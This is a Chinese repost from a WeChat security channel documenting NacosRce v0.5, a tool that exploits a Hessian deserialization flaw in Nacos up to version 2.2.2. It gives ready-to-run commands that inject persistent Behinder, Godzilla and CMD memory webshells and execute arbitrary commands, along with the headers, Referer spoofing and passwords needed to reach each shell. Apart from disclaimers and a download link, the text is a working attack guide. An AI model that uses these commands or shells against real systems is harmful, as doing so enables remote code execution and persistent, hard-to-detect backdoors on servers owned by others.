声明:本公众号分享的安全工具和项目均来自互联网,仅提供安全研究和学习使用。若用于其他目的,使用者需要承包所有法律责任及相关连带责任,与本公众号和工具作者无关。特在此声明。
使用方式
-
自动注入内存马并执行命令
java -jar NacosRce.jar Url Jraft端口 "Command"
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 "whoami"
-
只注入内存马
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell
内存马说明:
一、冰蝎内存马:
-
需要设置请求头x-client-data:rebeyond -
设置Referer: https://www.google.com/
-
路径随意 -
密码rebeyond
二、哥斯拉内存马:
-
需要设置请求头x-client-data:godzilla -
设置Referer: https://www.google.com/ -
路径随意 -
密码是pass 和 key
三、CMD 内存马:
-
需要设置请求头x-client-data:cmd 2.设置Referer: https://www.google.com/ -
请求头cmd:要执行的命令
v0.5版本实现了:
-
无法上网漏洞利用 -
可多次发起漏洞利用 -
同时注入冰蝎/哥斯拉/CMD内存马 -
内存马对nacos多版本进行了兼容 **tips: ** -
请用jdk1.8 2、适用于Nacos -
x <= 2.2.2 -
非集群的也能打哦 -
此内存马重启nacos仍然首先
关于Windows
如用下面的方式执行,注入内存马时会生成临时文件 C:WindowsTempnacos_data_temp 和 C:WindowsTempnacos_data_temp.class 文件
java -jar NacosRce.jar http://192.168.90.1:8848 7848 "whoami" windows
如果没有在最后加windows,临时文件会在/tmp/nacos_data_temp /tmp/nacos_data_temp.class,所以权限就足够了,不指定windows也能打windows没打成功也许是因为没权限操作 C盘或其他原因
关于编译
遇到依赖冲突无法编译的可以使用以下方式
下载地址
https://github.com/c0olw/NacosRce
原文始发于微信公众号(红蓝公鸡队):Nacos Hessian 反序列化漏洞利用工具 v0.5
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论